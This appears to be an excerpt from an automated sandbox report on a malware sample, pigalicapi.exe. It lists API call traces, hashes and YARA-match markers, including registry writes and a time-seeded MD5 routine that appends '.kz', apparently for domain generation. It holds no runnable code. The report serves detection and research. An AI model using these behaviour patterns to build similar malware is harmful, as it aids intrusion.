                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                          • Opcode ID: 6e386d98b9640f75d0a6f1123137f02428593481006cd3c8300e53770df9293a
                                                                                                                                                                                                                                                          • Instruction ID: f88db91ab05786069bf49e04c5e613cdef1dd901c246a1f4436086c7eebd2b21
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e386d98b9640f75d0a6f1123137f02428593481006cd3c8300e53770df9293a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EF04F31A0420DBBCB159FA5EC0DBADBFB5FF08711F104265B809A3250DF709984EBA5
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00A192A7
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00A192AE
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 00A192C1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                                                                                          • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                          • API String ID: 4190356694-3024904723
                                                                                                                                                                                                                                                          • Opcode ID: c17439ce6d68488ad40a8239f7ecf0f73f988a09f2bf006f4b5187f469613f6b
                                                                                                                                                                                                                                                          • Instruction ID: 4e56ca2470fb0352ef92cdf13ed6fb0ec7f7a1f1311c69a16a2a293f7ad8720f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c17439ce6d68488ad40a8239f7ecf0f73f988a09f2bf006f4b5187f469613f6b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85E09A75D80308FBCB00EBF4D94DBDDBB78BB08716F608594E905A2250D7749A85DB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00A172BD
                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 00A172F9
                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 00A17329
                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00A17343
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00A173A9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenQueryTimeValuewsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852505512-0
                                                                                                                                                                                                                                                          • Opcode ID: e1966fbb5585b6f799e8dc4ca9d8effb2fd174aa28310c813f758fd17305b0f0
                                                                                                                                                                                                                                                          • Instruction ID: e17ebd0035fd8f360eefa63a0672e595200695eb3844b355c688d743de046e76
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1966fbb5585b6f799e8dc4ca9d8effb2fd174aa28310c813f758fd17305b0f0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05415AB4A04208EFDB08DF94D885BEEBBB5BF48300F18855CE915AB291D775DA85CF90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,00000100,005684BC,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 0056930E
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00569346
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00569397
                                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 005693A9
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 005693B2
                                                                                                                                                                                                                                                            • Part of subcall function 00569273: RtlAllocateHeap.NTDLL(00000000,?,?,?,0056815B,00000220), ref: 005692A5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 313313983-0
                                                                                                                                                                                                                                                          • Opcode ID: 5f2e7b6add7168956435aabe798f743bfbbe2038356ea3b66229af8c8595d4b7
                                                                                                                                                                                                                                                          • Instruction ID: 7c1dc302a6046091493196cc43a7875960d01681a5289b612a07908d85ff890b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f2e7b6add7168956435aabe798f743bfbbe2038356ea3b66229af8c8595d4b7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB31CD72A0020AABDF248FA5DC89EAE7FA9FB50310F044528FC05DB290E735CD54CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00A17429
                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 00A17465
                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00A17473
                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 00A1748B
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00A17495
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenTimeValuewsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3926099652-0
                                                                                                                                                                                                                                                          • Opcode ID: cbee1ad1eb484f4cd6dabae716f2f79354f97a4dd726c42e30b07f55463b3576
                                                                                                                                                                                                                                                          • Instruction ID: 2fdb48df951f56bde0ff7b56cd432ff5193ac1c13c8c8c893f1de1eb5d3a6a68
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbee1ad1eb484f4cd6dabae716f2f79354f97a4dd726c42e30b07f55463b3576
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0216A75A40208BFDB14DFE4DC89FFE7B79BB48700F448558FA119A280D7B49A85CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00A19690
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 00A196DF
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00A196E9
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00A19701
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00A19719
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                                                                                          • Opcode ID: e85454cb869bdb4234757a9711b6bd743bace9fdbac2104e95b8e570c0abe304
                                                                                                                                                                                                                                                          • Instruction ID: e43421982e8c069a2f1b367a7907e5b65f049125c170f97ae5d853dce3518528
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e85454cb869bdb4234757a9711b6bd743bace9fdbac2104e95b8e570c0abe304
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18214C70900249EFCF14CFA4D994BEF7BB5BF48304F188548E914A7280D374EA94CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(005662FC,?,?,005662C1,00565E2D), ref: 00566A6D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00566AA2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00566AC9
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,005662C1,00565E2D), ref: 00566AD6
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,005662C1,00565E2D), ref: 00566ADF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                          • Opcode ID: 31b9da7c81c6ab38be36539f36d7c54af3e811d40c8e94e69b00c5b636623bfe
                                                                                                                                                                                                                                                          • Instruction ID: b15f15f8be4d36154aa95a40fad0e4a5d25cecc74d0a1d297fa70c30e3b2e114
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31b9da7c81c6ab38be36539f36d7c54af3e811d40c8e94e69b00c5b636623bfe
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C201FE36204601AFC611BAB57C4DD1B1D59FBE57747244519F915B3251EE70C805E170
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005690F3
                                                                                                                                                                                                                                                            • Part of subcall function 005673BC: HeapFree.KERNEL32(00000000,00000000,?,00569172,005662C1,00000000,005662C1,00000000,?,00569199,005662C1,00000007,005662C1,?,00567AA6,005662C1), ref: 005673D2
                                                                                                                                                                                                                                                            • Part of subcall function 005673BC: GetLastError.KERNEL32(005662C1,?,00569172,005662C1,00000000,005662C1,00000000,?,00569199,005662C1,00000007,005662C1,?,00567AA6,005662C1,005662C1), ref: 005673E4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00569105
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00569117
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00569129
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056913B
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 52ebd4d7c99a67021d0cd4bc51567a2cc24f5d7cc5ef5845430cf601b76a5c81
                                                                                                                                                                                                                                                          • Instruction ID: b4ab565b05659ac401908303ac8cf952f8ffc730def35471118492672b697131
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52ebd4d7c99a67021d0cd4bc51567a2cc24f5d7cc5ef5845430cf601b76a5c81
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4F0FF72A086096BC634EB54EC8AC167BDDBA5EB107644D09F808D7711DA30FC80DA70
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056C181
                                                                                                                                                                                                                                                            • Part of subcall function 005673BC: HeapFree.KERNEL32(00000000,00000000,?,00569172,005662C1,00000000,005662C1,00000000,?,00569199,005662C1,00000007,005662C1,?,00567AA6,005662C1), ref: 005673D2
                                                                                                                                                                                                                                                            • Part of subcall function 005673BC: GetLastError.KERNEL32(005662C1,?,00569172,005662C1,00000000,005662C1,00000000,?,00569199,005662C1,00000007,005662C1,?,00567AA6,005662C1,005662C1), ref: 005673E4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056C193
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056C1A6
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056C1B7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056C1C8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 87cc76941f967bb3c2a341b457bc7705f0c6ed54b0039e10f9cc750e2d88948b
                                                                                                                                                                                                                                                          • Instruction ID: 118d8370e56a8ce1dd3f5b10fe1c5577e3bf5694569250b3aaf86857495d4137
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87cc76941f967bb3c2a341b457bc7705f0c6ed54b0039e10f9cc750e2d88948b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9F03A749086269BCA61AF24BC0953A3F60BB7FB24705061AF81453372DB30095DFBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000104), ref: 0056BB64
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056BC2F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0056BC39
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                          • String ID: C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                          • API String ID: 2506810119-1864792673
                                                                                                                                                                                                                                                          • Opcode ID: f9f8188c07730d01309dd6c66822b46cf81888b4ff962e051ad41dab0bdb7377
                                                                                                                                                                                                                                                          • Instruction ID: d32916900afe8f595485c5d3969a01e9df77ceaef6eaf9bc991ac985853ef9f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9f8188c07730d01309dd6c66822b46cf81888b4ff962e051ad41dab0bdb7377
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83318F71A04219AFEB21DF99DC89DAEBFBCFB95710B104066E804D7221DB704E84DB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                          • String ID: @vZ$vZ
                                                                                                                                                                                                                                                          • API String ID: 269201875-2582936444
                                                                                                                                                                                                                                                          • Opcode ID: d9bb1d0a391d4c1b94005725592cec1606901562d46f1ccccc88f827f74dec05
                                                                                                                                                                                                                                                          • Instruction ID: 0510c3bff6c0db6b84bdb7017572e4d5659723f2c9da8d2770e74f7ca6b9ce26
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9bb1d0a391d4c1b94005725592cec1606901562d46f1ccccc88f827f74dec05
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B11E671F006154ADB205F2CAC05B793FA4BBA6724F181F16FA24CB3E0D770D84667A1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0056B4A4
                                                                                                                                                                                                                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0056B4A9
                                                                                                                                                                                                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0056B4AE
                                                                                                                                                                                                                                                            • Part of subcall function 0056B6B8: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0056B6C9
                                                                                                                                                                                                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0056B4C3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1761009282-0
                                                                                                                                                                                                                                                          • Opcode ID: c159cde3fdb6edac0943f80b033b7cce3f46555bf4def25ce9c02c725699af90
                                                                                                                                                                                                                                                          • Instruction ID: f73e7179527ab0baaf90943defdab15efadaa175f4259f92460d044e7532ff35
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c159cde3fdb6edac0943f80b033b7cce3f46555bf4def25ce9c02c725699af90
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3C04814005603103C203AB2A20B6AD0F223CF2BCAB9024C1AE81D7A1B9F4B08CA6273
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00A19308
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00A18BFF
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: GetLastError.KERNEL32 ref: 00A18C09
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00A18C38
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00A18C59
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00A18C71
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 00A18C99
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00A18CC1
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 00A18CD5
                                                                                                                                                                                                                                                            • Part of subcall function 00A18BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A18CE1
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,.kz), ref: 00A193DB
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
                                                                                                                                                                                                                                                          • String ID: .kz
                                                                                                                                                                                                                                                          • API String ID: 2740484991-4216035510
                                                                                                                                                                                                                                                          • Opcode ID: c53ad7f3480d3b2756fe1abc0b1ec3f5d8c014bede06ff5b18def84c5fef9c5d
                                                                                                                                                                                                                                                          • Instruction ID: 7110d0bb4fd4c0fa993801f606f4c27b8a15f0c7c359438bdfab96d07a796af8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c53ad7f3480d3b2756fe1abc0b1ec3f5d8c014bede06ff5b18def84c5fef9c5d
